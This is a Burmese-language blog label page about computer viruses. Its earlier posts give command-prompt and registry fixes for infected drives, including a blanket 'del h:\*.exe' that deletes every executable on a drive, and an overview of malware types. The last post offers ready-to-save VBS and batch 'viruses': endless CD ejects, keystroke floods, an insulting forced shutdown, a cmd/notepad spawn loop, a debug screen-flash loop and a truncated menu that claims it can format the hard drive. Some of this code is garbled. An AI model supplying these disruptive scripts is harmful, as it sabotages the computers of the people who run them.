Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Thursday, 3 January 2013

Virus များကို CMD ဖြင့်သတ်ခြင်း

ကွန်ပျူတာအသုံးပြုရာတွင် Anti Virus Software များအသုံးမပြု၍သော်လည်းကောင်း၊ အသုံးပြု ထားသည့် Anti Virus Software များ ကောင်းစွာ အလုပ်မလုပ်ခြင်းကြောင့်သော်လည်းကောင်း Virus များပျံ့နှံ့ကူးစက်နိုင်ပါသည်။ ထိုသို့ကြုံတွေ့ရပါက CMD မှတစ်ဆင့် Virus များ ကို ရှင်းလင်းနိုင်ပါသည်။ ထိုသို့ရှင်းလင်းရန်အတွက် Virus အမည်ကိုသိရှိရန်လိုအပ်ပါသည်။ ကွန်ပျူတာ အသုံးပြုသူများအနေဖြင့် သိရှိထားသင့်ပြီး အကျိုးရှိနိုင်သည့် နည်းလမ်းတစ်ခုဖြစ်ပါသည်။ အောက်ဖော်ပြပါအတိုင်း တစ်ဆင့်ခြင်း စီ ပြုလုပ်သွားရပါမည်။
၁။ Start \ Run တွင် cmd ဟုရိုက်၍ OK ပေးရပါမည်။

၂။ ထို့နောက် ကွန်ပျူတာတွင်ရှိနေသည့် Partition များမှ Virus 0င်ရောက်နေသည့် အပိုင်းသို့ဝင်ရောက်ရပါမည်။ ဆိုလိုသည်မှာ ကွန်ပျူတာတွင် Partition ၃ ခုရှိသည့်အနက်  D တွင် Virus ၀င်ရောက်နေပါက cmd တွင် D: ဟုရိုက်၍ Enter ကို နှိပ်ပေးရပါမည်။ ထိုအခါ cmd တွင် Virus ၀င်ရောက်နေသည့် Partition သို့ဝင်ရောက်ပြီးဖြစ်ပါသည်။

၃။ ထို့နောက် attrib -r -h -s(virus name.frile extension) ရိုက်၍ Enter ပေးရပါမည်။ virus name.file extension ဆိုသည်မှာ မိမိစက် တွင် ၀င်ရောက်နေသည့် Virus အမည်နှင့် အမျိုးအစားကို ဆိုလိုခြင်းဖြစ်ပါသည်။

၎။ ထိုသို့ပြုလုပ်ပေးပြီးပါက c:\windows>- ဟုcmd တွင်တွေ့မြင်နေရမည်ဖြစ်ပြီး Virus ကိုရှင်းလင်းရန်အတွက် del(virus name.frile extension) ဟုရိုက်၍ Enter ပေးရပါမည်။ ထိုသို့ပြုလုပ်ပြီးပါက ကွန်ပျူတာတွင်ဝင်ရောက်သော Virus ကိုရှင်းလင်းပြီးဖြစ်ပါသည်။ (ချယ်ရီမြေ၀က်ဆိုဒ်မှ ကူးယူဖော်ပြသည်။)

အပြည့်အစုံ

Memory Stick၊ Flash Drive များနှင့် exe Virus

Memory Stick၊ Flash Drive များနှင့် exe Virus
         Memory Stick များနှင့် External Hard disk များကိုကွန်ပျူတာများတွင် တပ်ဆင်အသုံးပြုရာ၌ ကြုံတွေ့ရသည့် Virus များအနက် exe virus ကို command prompt အသုံးပြု၍ ရှင်းလင်းနည်းဖြစ်ပါသည်။ Antivirus Software  Update မဖြစ်သည့်ကွနပျူတာများအတွက် အတိုင်းအတာတစ်ခုအထိစိတ်ချ ရစေမည် ဖြစ်သည့်အပြင် ကွန်ပျူတာတွင်အသုံးပြုသည့် Dos Command အကြောင်းကိုလည်းသိရှိနားလည်စေနိုင်မည် ဖြစ်ပါသည်။
          ပထမဦးစွာ Flash Drive ကိုကွန်ပျူတာတွင်တပ်ဆင်ပြီးနောက်  Run တွင် cmd ကိုရိုက်၍ Command Prompt သို့ဝင်ရောက်ရပါမည်။ ထို့နောက် cmd တွင် dir h:\*.exe /a ဟုရေးသား၍ Enter နှိပ်ရပါမည်။ ၄င်း command တွင်
          Dir h:\ ၏ဆိုလိုရင်းမှာ dir သည် Folder များ၊ File များကိုကြည့်ရှူရန်အတွက်ဖြစ်ပြီး h:\ သည် ကွန်ပျူတာတွင် တပ်ဆင်ထားသော  Memory Stick ၏ Drive Name ဖြစ်ပါသည်။
          *.exe တွင် *. သည် Memory Stick H အတွင်းရှိ Folder များအားလုံးကို သီးသန့်ကြည့်ရှူရန်အတွက် ဖြစ်ပြီး *.exe ဟုဆိုသည့်အတွက် Memory Stick H အတွင်းရှိ exe များအားလုံးကို ကြည့်ရှူနိုင်ရန်အတွက် ဖြစ်ပါသည်။
          /a သည် System File များကိုဖြစ်စေ၊ Hidden ဖြစ်နေသည့် Virus များနှင့် ထို Virus များ ကြောင့်Hidden ဖြစ်နေသည့် File များနှင့် Folder များကို တွေ့မြင်နိုင်ရန်အတွက်ဖြစ်ပါသည်။ ထို့ကြောင့် dir h:\*.exe /a မှာ Memory Stick H အတွင်းရှိ Hidden ဖြစ်နေသည့် exe virus များကို ဖော်ပြရန် အတွက်အသုံးပြုခြင်းဖြစ်ပါသည်။ ထို့နောက် အောက်ဖော်ပြပါပုံအတိုင်း Memory Stick H အတွင်းရှိ exe Virus များကိုတွေ့မြင်ရမည်ဖြစ်ပါသည်။
အဆိုပါ exe virus များကို ရှင်းလင်းရန်အတွက် del h:\*.exe command ရိုက်၍ Enter နှိပ်ရပါမည်။ ၄င်းမှာ Memory Stick H အတွင်းရှိ exe များအားလုံးကို Delete ပြုလုပ်ခြင်းဖြစ်ပါသည်။ သို့ရာတွင် အောက်ဖော်ပြပါပုံအတိုင်း Could Not Find h:\*.exe ဟု Drive H အတွင်း exe File များမရှိပါဟု Message ကို တွေ့မြင်ရမည်ဖြစ်ပါသည်။ dir h:\*.exe /a ဖြင့်ကြည့်ရှူစဉ်က exe File များကိုတွေ့မြင်ရပြီး ယခု Delete ပြုလုပ်သည့်အခါတွင် မရှိပါဟု message တွေ့မြင်ရခြင်းမှာ Virus များမှထိန်းချုပ်ထားသည့်အတွက်ဖြစ် ပါသည်။
          အဆိုပါ Virus များ၏ထိန်းချုပ်မှုကိုဖြေရှင်းရန်အတွက် attrib h:\*.exe –s –r –h Command ကိုအသုံးပြုရပါမည်။ ၄င်း Command တွင် attrib သည် attribute ကိုဆိုလိုခြင်းဖြစ်ပြီး ၄င်းသည် File တစ်ခုကို ပုံမှန်အားဖြင့် ဖျက်ဆီးမရအောင်ပြုလုပ်နိုင်ပါသည်။ s သည် System File အဖြစ်သက်မှတ်ထားပြီး သာမန်  Delete ဖြင့်ဖျက်၍မရပါ။ r သည် Read Only ဖြစ်ပြီး တွေ့ရှိနိုင်သော်လည်း ရေးသားပြင်ဆင်ခွင့်မပြုပေ။ h သည် hidden ဖြစ်ပြီး ပုံမှန်အားဖြင့်မြင်တွေ့နိုင်ခြင်းမရှိစေရန် လုပ်ဆောင်ပါသည်။ exe virus သည် system File အယောင်ဆောင်ထားပြီး ဖျက်ဆီးမရအောင်ပြုလုပ်ထားခြင်း၊ ပုံမှန်အားဖြင့်မြင်တွေ့ခြင်းမရှိစေရန် Hidden ပြုလုပ်ထားခြင်းစသည့်ထိန်းချုပ်ထားမှုများကို ဖြေရှင်းရန်အတွက် – ကိုအသုံးပြုခြင်းဖြစ်ပါသည်။
          Virus များ၏ထိန်းချုပ်မှုကို ဖြေရှင်းပြီးနောက် exe Virus ကိုရှင်းလင်းနိုင်ပြီဖြစ်ပါသည်။ ယခင်အသုံးပြု ပြီးသည့် del h:\*.exe Command ကိုအသုံးပြုရပါမည်။ ထို့နောက် Memory Stick H အတွင်းရှိ exe virus များ ကျန်ရှိနေခြင်းရှိ၊ မရှိကို dir h:\*.exe /a ဖြင့်ကြည့်ရှူပါက exe Virus များမရှိတော့ကြောင်း တွေ့မြင်ရမည် ဖြစ်ပါသည်။
ထို့ကြောင့် ကွန်ပျူတာများအတွင်းရှိ exe Virus များကို Command Prompt ဖြင့်လွယ်ကူစွာ ရှင်းလင်းနိုင်ပါသည်။Memory Stick များအတွင်းရှိ exe Virus များကို ရှင်းလင်းရန်အတွက် အောက်ဖော်ပြပါ Command 3 ကြောင်းသာလိုအပ်ပါသည်။
dir h:\*.exe /a                             Virus များကိုစစ်ဆေးခြင်း။
attrib h:\*.exe –s –r –h        Virus များ၏ထိန်းချုပ်မှုကိုဖြေရှင်းခြင်း။
del h:\*.exe                       Virus များကိုရှင်းလင်းခြင်း။

အပြည့်အစုံ

Virus များကြောင့် File၊ Folder များပျောက်ဆုံးနေလျင်

ကွန်ပျူတာတွင်ဖြစ်စေ၊ Flash Drive များတွင်ဖြစ်စေ Virus များကြောင့် File၊ Folder များပျောက် ဆုံးနေပြီး Use space တွင်လည်းအဆိုပါ File များကိုသိမ်းဆည်းထားသည်ဟု ဖော်ပြနေပါက အောက်ပါအတိုင်းလုပ်ဆောင်ခြင်းဖြင့် File၊ Folder များကိုပြန်လည်တွေ့ရှိရမည်ဖြစ်ပါသည်။ ထိုသို့ပြု လုပ်ခြင်းသည် Virus များကို ရှင်းလင်းခြင်းမဟုတ်ပဲ Virus Effect ကြောင့်ပျောက်ဆုံးနေသည့် Data များကိုသာ ရှာဖွေခြင်းဖြစ်ပါသည်။ ထို့ကြောင့် Data များကိုရှာဖွေပြီးသော်လည်း Virus ကိုရှင်းလင်း ရန် လိုအပ်မည်ဖြစ်ပါသည်။
၁။ Start မှတစ်ဆင့် Run Box တွင် regedit ဟုရေးသား၍ Registry Editor သို့ဝင်ရောက်ရပါမည်။
၂။ Registry Editor တွင် HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\
CurrentVersion\ Explorer\ Advanced\ FolderHidden\ SHOWALL
ထိရောက်စေရန် အဆင့်ဆင့် ၀င်ရောက်ရပါမည်။
၃။ SHOWALL ကို Left Cclick ဖြင့်နှိပ်၍ ညာဘက် Box (Pane) အတွင်းရှိ CheckedValue  ကို Right Click မှတစ်ဆင့် Modify သို့ဝင်ရောက်ရပါမည်။ ValueData တွင် ၀(သုည) ကို 1 ဟုပြောင်း လဲပေးရပါမည်။
၎။ အကယ်၍ ညာဘက် Box (Pane) အတွင်း၌ CheckedValue ကိုမတွေ့ရှိပါက SHOWALL ကို Right Click နှိပ်၍ New မှတစ်ဆင့် DWORD (32-bit) Value ကိုတည်ဆောက်ပေး၍ အမည်ကို CheckedValue ဟုပေး၍ Value ကို 1 ဟုပေးရပါမည်။
၅။ ထို့နောက်ကွန်ပျူတာကို Restart ချပြီးနောက် Hidden ဖြစ်နေသည့် File၊ Folder များကိုပြန်လည် တွေ့ရှိရမည်ဖြစ်ပါသည်။ (ချယ်ရီမြေ၀က်ဆိုဒ်မှ ကူးယူဖော်ပြသည်။)

အပြည့်အစုံ

Tuesday, 25 December 2012

Virus အကြောင်းများ

About Virus Value Value တစ်ခုမှာရှိတဲ့ Data တစ်ခုကိုဖော်ပြတဲ့နေရာမှာ Data type အမျိုးအစား (၆)မျိုးအနက်က တစ်ခုခုနဲ့ဖော်ပြနိုင်ပါတယ်။ အဲ့ဒီ (၆) မျိုးကတော့
About Virus Value
Value တစ်ခုမှာရှိတဲ့ Data တစ်ခုကိုဖော်ပြတဲ့နေရာမှာ Data type အမျိုးအစား (၆)မျိုးအနက်က တစ်ခုခုနဲ့ဖော်ပြနိုင်ပါတယ်။ အဲ့ဒီ (၆) မျိုးကတော့ ...........

1.REG_BINARY
Raw Binary Data, Hardware သတင်းတွေကို ကွန်ပျူတာမှ binary အဖြစ်သိမ်းပေမယ့်၊ Registery editor မှာ အကျဉ်းခြုံးရန် Hexa Decimal နဲ့ပြပေးတယ်။

2.REG_DWORD
4 byte အရှည်ရှိတဲ့ ကိန်းဂဏန်းနဲ့သိမ်း၊ Device Driver များ၊ Service နှင့်သက်ဆိုင်သော
ကန့်သတ်ချက်(parameter) များကိုဖော်ပြပေးတယ်။

3.REG_EXPAND_SZ
ကိန်းရှင် (variable) များ

4.REG_MULTI_SZ
multiple type, user များသိနိုင်သော Char နှင့် ဂဏန်းများရောနှောပုံ၊ နေရာလွတ်၊ ကော်မာနဲ့ အခြားအမှတ်တွေပါ။

5.REG_SZ
စာသားများပါဝင်ပြီး အလျားသတ်မှတ်ချက်ရှိသော အက္ခရာစဉ်ကိန်းတန်း တစ်ခု။

6.REG_FULL_RESOCE_DESCRIPTOR
Hardware တစ်ခုကို (Dirver တစ်ခု) Resource List ကိုသိမ်းဆည်းရန် ဒီဇိုင်းထုတ်ထားသော Nested Array တစ်ခုတို့ပဲ ဖြစ်ပါတယ်။

About Virus (No-1)

ဗိုင်းရပ်စ် ဆိုသည်မှာ (ပထမပိုင်း)


ဗိုင်းရပ်စ်ဆိုသည်မှာ လို့ခေါင်းစဉ်တပ်ထားတာ ကျွန်တော်လဲ သိသလောက်လေး ပြောပြပေးတာပါ။  General Knowledge ပေါ့ဗျာ….. ကဲ ဖတ်ပေးဦးဗျာ………. အကျိုးရှိမှာပါ…
လူတွေရော အားလုံးပါပဲ တစ်ခုခုဆို Virus လို့ပဲ သိပါတယ်။ တကယ်တော့ Virus အနွယ်ဝင် အမျိုးအစားများရှိနေပါတယ်။ အဲဒါတွေအကြောင်း ရှင်းလင်းပြထားတဲ့ မူလရေးသားသူ ဆရာမျိုးသူရ အားအထူး ကျေးဇူးတင်ရှိပါတယ်။

၁။ Computer Virus
Computer virus ဆိုတာ သူ့ကိုသူ attach လုပ်ထားတဲ့ program (သို့) file တစ်ခုဖြစ်ပြီး ကွန်ပျူတာတစ်ခုကနေ တစ်ခုကို ပြန့ှ်နှံ့ကူးစက်နိုင်ပါတယ်.. လူတွေမှာ Virus ကူးသလိုပဲ ပြန့်နှံ့ပြီးတော့ ကွန်ပျူတာရဲ့ System ကိုပုံမှန်အလုပ် မလုပ်အောင် နှောက်ယှက်မယ်၊ Windows ကို Error တွေများလာအောင် လုပ်မယ်၊ user data တွေကို ဖျက်ဆီးမယ်၊ Hardware တွေ Software တွေ အရေးကြီးတဲ့ File တွေကို ဖျက်ဆီးမယ်... စတာတွေကို လုပ်ဆောင်ပါတယ်။ ဒါပေမယ့် Virus အများစုဟာ executable fileတွေဖြစ်ကြပါတယ်.. ဥပမာ.. chrome.exe, system.bat , flashy.com စသဖြင့်ပေါ့ .. သူတို့ဟာ ကွန်ပျူတာထဲမှာ ရှိနေရင်တောင်မှ သင်ကိုယ်တိုင်မှ သွားမဖွင့်ရင်/ သွားမ run မိရင် ကွန်ပျူတာကို ဘာမှ မထိခိုက်နိုင်ပါဘူး... ဒါကြောင့် မှတ်ထားရမှာက လူ၏ လုပ်ဆောင်ချက်မပါဝင်ပဲ Computer Virus သည် မပျံ့နှံ့ မကူးစက်နိုင်ပါ။ Virus ပျံ့နှံ့နိုင်တဲ့ နည်းလမ်းတွေကတော့ အမျိုးမျိုးရှိပါတယ်...forward E-mail က attached file တွေ၊ memory stick(flash/thumb drives) တွေ၊ Full sharing ကနေ virus infected file ထည့်တာတွေ၊ သူငယ်ချင်း အချင်းချင်း မသိပဲနဲ့ Virus infected file ကို share လုပ်မိတာတွေ .. စသဖြင့်ပေါ့...ဗျာ

၂။ Malware

Malware ဆိုတာ အင်္ဂလိပ်စကား ၂ လုံး Malicious Software ကိုပေါင်းစပ်ပြီး ကွန်ပျူတာ ပညာရှင်တွေက အလွယ်ခေါ်ကြတဲ့ virus လို program တွေပါပဲ.. အဲဒိ Malware ကကွန်ပျူတာပိုင်ရှင်ရဲ့ ခွင့်ပြုချက်မရပဲ ၊ မသိစေပဲ single computer / server / computer network ထဲ ၀င်ပြီး ကွန်ပျူတာ System ပျက်ဆီးစေနိုင်အောင် ၊ အနှောက်အယှက်ဖြစ်အောင် ရေးလေ့ရှိကြပါတယ်.. Malware တစ်ခုမှာ Computer VIrus , worms, trojan horses, most rootkits, spyware, dishonest adware, crimeware and other malicious and unwanted software တွေပါဝင်လေ့ရှိပါတယ်..

၃။ worm

worm ဆိုတာက virus နဲ့ ဆင်တူအောင် ရေးထားကြတာပါပဲ။ virus တစ်ခုရဲ့ Sub-class လို့လည်း ခေါ်လို့ရပါတယ်။ သူကတော့ Virus လို လူကဖြန့်မှ ပျံ့တာမျိုးမဟုတ်ပဲ သူပါသူ Computer network ထဲမှာရှိတဲ့ အခြားကွန်ပျူတာတွေကို လူရဲ့လုပ်ဆောင်ချက် လုံးဝမပါပဲနဲ့ ပျံ့နှံ့စေတာဖြစ်ပါတယ်။ သူ့ပါသူ ဖြန့်နိုင်တဲ့ စွမ်းရည်ရှိတာပေါ့နော်။ အကြီးမားဆုံး အန္တရာယ်ကတော့ သူက သူ့ပါသူ System file တစ်ခုလို အယောင်ဆောင်ပြီး သူ့ကိုယ်သူ သန်းပေါင်း ၁၀၀ လောက် copy ပွားနိုင်ပါတယ်။ Hard disk ရဲ့ used space ကို များလာစေတယ်..Computer ရဲ့ System memory usage တွေ များလာစေတယ်။ network bandwidth တွေကိုတက်လာစေတယ်။ Run ထားတဲ့ program တွေကို not responding ခဏခဏဖြစ်လာစေတယ်။ လူသိများတဲ့ worm ကတော့ Blaster worm ပါ။ ထွင်လိုက်တဲ့လူကတော့ ၂၀၀၅ ခုနှစ်တုန်းက အသက် ၁၈နှစ် အရွယ် Jeffrey Lee Parson ဖြစ်ပြီး ထောင် ၁၈ လ ကျသွားခဲ့ပါတယ်။ Blaster worm က windows စတက်တာနဲ့ Registry ကီး HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Run\windows auto update = msblast.exe မှာ နေရာယူပါတယ်။ msblast.exe ဆိုတာကတော့ နာမည်တူပေးထားတာပေါ့။ Blaster worm က Computer System ထဲမှာ ရှိနေပြီဆိုတာနဲ့ Cracker တွေက ကွန်ပျူတာကို Remote လုပ်ပြီး ထိန်းချုပ်နိုင်အောင် ရေးထားပါတယ်။
About Virus (No-2)
ဗိုင်းရပ်စ်ဆိုသည်မှာ (ဒုတိယပိုင်း)

၎။ Trojan horse

Trojan horse ကို Trojan လို့လည်းခေါ်ပါတယ်။ Trojan ဆိုတဲ့ မြင်းရုပ်ကြီးအကြောင်း ငယ်ငယ်က ကမ္ဘာ့သမိုင်းမှာသင်ဖူးကြမှာပေါ့။ Tri ဇာတ်ကားလည်း ကြည့်ဖူးကြမှာပါ။ အဲဒိထဲကလိုပဲ အလုပ်လုပ်တယ်လို့ပြောလို့ရပါတယ်။ ပုံမှန်အားဖြင့် အသုံးဝင်တဲ့ Software တွေမှာ ထည့်ထားတတ်ကြပါတယ်။ ဥပမာပေါ့ဗျာ... Game တစ်ခုကို Install ပြီးဆော့နေပေမယ့် အခြားတစ်ဖက်မှာ Hacker တွေ Cracker တွေက ကွန်ပျူတာထဲကို ၀င်မွှေနေလို့ရအောင်လုပ်ပေးနေတယ်။ အဲဒီတော့ အဲဒိ Game ကို Trojan horse လို့ခေါ်တာပေါ့။ တစ်ကယ်တော့ Game က တရားဝင်ထုတ်ထားတဲ့ Game ပဲ.. ဒါပေမယ့် Virus infected ဖြစ်နေတဲ့ Game လို့ပြောရလိုဖြစ်နေတာပေါ့။ နမူနာ Trojan Horse ကတော့ waterfalls.scr ဆိုတဲ့ free waterfall screen saver ပဲဖြစ်ပါတယ်။
Trojan horse တစ်ခုဟာ အောက်ပါအချက်များကို လုပ်ဆောင်ပေးနိုင်ပါတယ်...
* Remote Access
* Data Destruction
* Downloader/dropper
* Server Trojan(Proxy, FTP , IRC, Email, HTTP/HTTPS, etc.)
* Disable security software
* Denial-of-service attack (DoS)

၅။ Spyware
သူကတော့ သူခိုးပေါ့နော်.. Spy တွေ ဘယ်လို အလုပ်လုပ်သလဲဆိုတာ သိကြမှာပါ။ သူက ကွန်ပျူတာကို ထိခိုက်ဖျက်ဆီးချင်မှ ဖျက်ဆီးမယ်  ဒါပေမယ့် ကွန်ပျူတာမှာသုံးနေတဲ့ user ရဲ့ အမျိုးမျိုးသော အချက်အလက်တွေ၊ အရေးကြီးတဲ့ Data တွေကို သူ့ရဲ့ Main server တစ်ခုခုကို နေ့စဉ် သတင်းပို့ပေးနေတယ်။ Spyware တွေက များသော အားဖြင့် Web browser တွေကနေ ၀င်နိုင်ပါတယ်။ ပြီးရင် သူက Browser home page ကိုပြောင်းထားတတ်ပါတယ်။ သင့်ကို Error message တွေ အမျိုးမျိုးပြမယ်..(ဥပမာ- သင့်ကွန်ပျူတာမှာ problems တွေများနေပြီ..အဲဒါတွေပြင်ချင်ရင် အောက်ကခလုတ်ကို နှိပ်ပါ) စသဖြင့် ဆွဲဆောင်မယ်၊ သင်က link တစ်ခုကို click လိုက်ပေမယ့် သင်မဖွင့်ပဲနဲ့ အခြား Porn Site တွေ အလိုလိုပွင့်လာမယ် စသဖြင့်ပေါ့ဗျာ။ တစ်ချို့ လူတွေက http cookie တွေကို Spyware တွေလို့ ထင်ကြပါတယ်။ တကယ်တော့ မဟုတ်ပါဘူး ဒါပေမယ့် အဲဒိ cookie ထဲမှာ Spyware က track လုပ်နိုင်တဲ့ Data တွေ ပါလာတတ်တာကြောင့်  Spyware Remover တော်တော်များများက Cookie တွေကို ဖျက်ပစ်ကြတာပါ။ Spyware ကို ကာကွယ်ချင်ရင်တော့ pop-ups ကျလာတဲ့ link တွေကို ရှောင်တာကောင်းပါတယ်... Free Spyware Remover တွေနဲ့လည်း ကာကွယ်နိုင်ပါတယ်။

၆။ Adware
Adware ဆိုတာကတော့ Advertising-supported software (သို့) software package တစ်ခုဖြစ်ပါတယ်။ သူကတော့ Screen မှာ Automatic ပေါ်လာအောင် ဖန်တီးထားပြီး Download အတင်းလုပ်ခိုင်းပါတယ်။ အချို့သော Adware များဟာ Spyware များဖြစ်တတ်ကြပါတယ်။

၇။ Crimeware
Crimeware ဆိုတာကတော့ Spyware, Adware, Malware အမျိုးအစားတွေထဲမှာပါပါတယ်။ သူ့ရဲ့ရည်ရွယ်ချက်ကတော့ financial crime တွေအတွက် ရည်ရွယ်ပြီး ရေးကြတာများပါတယ်။ သူက user password တွေ၊ links တွေ၊ အချက်အလက်တွေကို မှတ်သားထားနိုင်ပြီး သူ့ကို Run ထားတဲ့လူက ပြန်ဖွင့်ကြည့်ပြီး user data တွေကို ခိုးယူနိုင်တာပေါ့။ ဥပမာပြောရရင်
ခုခေတ်စားနေတဲ့ key logger တို့ keystroke logging software တို့ဟာ Crimeware အမျိုးအစားတွေပဲဖြစ်ပါတယ်။
Source; http://bonemyathein.blogspot.com/p/virus.html























































 

အပြည့်အစုံ

Thursday, 20 October 2011

USB Memory Stick ထဲက ဖိုင်တွေကို ဖျက်မရ၊ ကော်ပီ လုပ်မရဘူးဆိုရင်...

ကွန်ပျူတာထဲကို ဗိုင်းရပ်စ်တွေ ကိုက်သွားတဲ့အခါ။ ဒါမှမဟုတ် ကိုယ့် Memory Stick ကို အခြားစက်မှာ ထိုးမိပြီး မိမိစက်ကို ပြန်ထိုးလိုက်တဲ့အခါ လျှို့ဝှက် Script တစ်ခုက မိမိကွန်ပျူတာထဲကို လျှို့ဝှက် ၀င်ရောက်သွားပါတယ်။ အဲဒီ Script က ဗိုင်းရပ်စ်လဲ မဟုတ်ပြန်ပါဘူး။ သူက Autorun ကနေတဆင့် ၀င်ရောက်သွားတာပါ။ ဘာဘဲဖြစ်ဖြစ် အခြားသော အကြောင်းအမျိုးမျိုးကြောင့် USB Memory Stick ထဲကဖိုင်တွေကို ကော်ပီလုပ်မရ ဖျက်မရတော့ဘဲ Write Protect ဆိုတဲ့ Error ဖြစ်ပေါ်လာရပါတယ်။ အဲဒီလိုဖြစ်လာပြီဆိုရင် ဘာလုပ်လို့ ဘာကိုင်ရမှန်း မသိအောင် ဖြစ်ရတော့တာပါဘဲ။ ကိုယ်တိုင်လဲ ကြုံခဲ့ရဘူး ပါတယ်။ ဒါကြောင့် လွယ်လွယ်ကူကူနဲ့ ဖြေရှင်းနည်းလေးကို ရေးပြပေးလိုက်ရပါတယ်။

HKEY_LOCAL_MACHINE>>System>>CurrentControlSet>>Control>>StorageDevicePolicies ထိရောက်အောင် အဆင့်ဆင့်သွားပါ။ ရောက်ရင် ညာဘက်အခြမ်းမှာ WriteProtect ဆိုတဲ့ အပြာရောင် ဖိုင်လေးပထမဆုံး Start>Run(box) မှာ regedit လို့ ရိုက်ထည့်ပါ။ Registry Editor ပေါ်လာပါမယ်။ အဲဒီထဲမှာ တဖိုင်ကို နှစ်ချက်ကလစ်ပြီးရင် Value Data ‘1’ ဆိုတာကို ‘0’ လို့ပြန်ပြောင်းပေးလိုက်ပါ။ ပြီးရင် Registry Editor မှ အပြီးထွက်ပြီး ကွန်ပျူတာကို Restart ချလိုက်ပါ။ ပြီးရင် ပြန်စမ်းကြည့်ပါ။ Write Protect ဆိုတဲ့ Error မပေါ်တော့ပါ/Memory Stick ပျက်စီးနေပြီဆိုရင်တော့ အထက်ပါနည်းလဲ အသုံးမ၀င်တော့ပါ။

အပြည့်အစုံ

Notepad နှင့်ရေးထားသော Virusများ

1)သင့် CD Drive ကိုဆက်တိုက်ပွင့်နေပါလိမ့်မယ်။ဖွင့်လိုက်ပိတ်လိုက်ပေါ့။
code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ

2) Caps Lock ကိုဆက်တိုက်ဖွင့်လိုက်ပိတ်လိုက်လုပ်နေပါလိမ့်မယ်။
code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ

3) ဒါလေးကသင့်ကွန်ပြူတာကို မက်ဆေ့ ပေးပြီး shutdown ကျသွားစေပါတယ်။
code :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

ဒီဟာလေးကို ( .bat) နဲ့ဆေ့ပါ

4) Enter key ကိုဆက်တိုက်နှိပ်နေမှာပါ။
code :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ.

5) CMD နဲ့ Notepad တွေရပ်မရအောင်ဆက်တိုက်ဖွင့်တာလေးပါ။ဒါလေးကနဲနဲလေးဆိုးတယ်။
code:
@echo off
:A
start cmd
start notepad
goto :A


ဒီဟာလေးကို ( .bat) နဲ့ဆေ့ပါ..

6) Backspace တိုက်ပွင့်နေမှာပါ။သင်စာရိုက်လို့မရပါ။
code :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ

7) သင့် keyboard လေးကိုဟက်ပြီး သင်ဟာအရူးဆိုပြီးသင်စာရိုက်တိုင်းပေါ်နေမှာပါ။
code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

ဒီဟာလေးကို ( .vbs) နဲ့ဆေ့ပါ

8. Notepad ကိုဆက်တိုက်ပွင့်နေမှာပါ။
code:

@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
ဒီဟာလေးကို ( .bat) နဲ့ဆေ့ပါ

9) အောက်ကဖြစ်စဉ်တွေကိုလုပ်ပေးမယ့် program လေးပါ။ပေးလာမယ့် မက်ဆေ့တွေကကျွန်တော်ထင် သလိုရှောက်ရေးထားတာပါ။

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
code:

@echo off
title The end of the world
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

ဒီဟာလေးကို ( .bat) နဲ့ဆေ့ပါ


10) Lighting .bat

သင့် မော်နီတာဟာဘာမှ မမြင်ရပဲ လင်းလက်နေတဲ့ ဖန်သားပြင်ကိုသာမြင်ရမှာပါ။

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug nul
del z.dbg

သင်ပြန်ထွက်ချင်ရင် CTRL-ALT-DELETE နဲ့ပြန်ထွက်လိုက်ပါ။
အောက်ကကုတ်ဆိုရင် အဲဒါနဲ့မရပါ။ctrl+shirt+esc နဲံ့ရမယ်။
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug nul
del z.dbg
goto a

အပြည့်အစုံ

ဗိုင်းရပ်စ်တွေကို နာမည်ပေးပုံ


